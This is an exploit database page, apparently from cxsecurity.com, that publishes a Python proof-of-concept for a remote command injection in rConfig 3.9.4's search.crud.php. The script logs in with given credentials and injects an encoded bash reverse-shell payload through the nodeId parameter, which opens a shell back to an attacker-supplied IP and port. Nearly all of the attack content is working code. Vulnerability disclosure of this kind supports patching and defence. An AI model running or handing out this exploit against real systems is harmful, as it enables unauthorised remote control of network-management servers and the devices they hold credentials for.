rConfig 3.9.4 search.crud.php Remote Command Injection

2020.03.23
Credit: Matthew Aberegg, Michael Burkey
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection # Date: 2020-03-21 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.rconfig.com # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip # Version: rConfig 3.9.4 # Tested on: Cent OS 7 (1908) #!/usr/bin/python3 import requests import sys import urllib.parse from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) != 6: print("[~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port") exit() host = sys.argv[1] username = sys.argv[2] password = sys.argv[3] attacker_ip = sys.argv[4] attacker_port = sys.argv[5] login_url = host + "/lib/crud/userprocess.php" payload = "|| bash -i >& /dev/tcp/{0}/{1} 0>&1 ;".format(attacker_ip, attacker_port) encoded_payload = urllib.parse.quote_plus(payload) def exploit(): s = requests.Session() res = s.post( login_url, data={ 'user': username, 'pass': password, 'sublogin': 1 }, verify=False, allow_redirects=True ) injection_url = "{0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines=".format(host, encoded_payload) res = s.get(injection_url, verify=False) if res.status_code != 200: print("[~] Failed to connect") if __name__ == '__main__': exploit()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top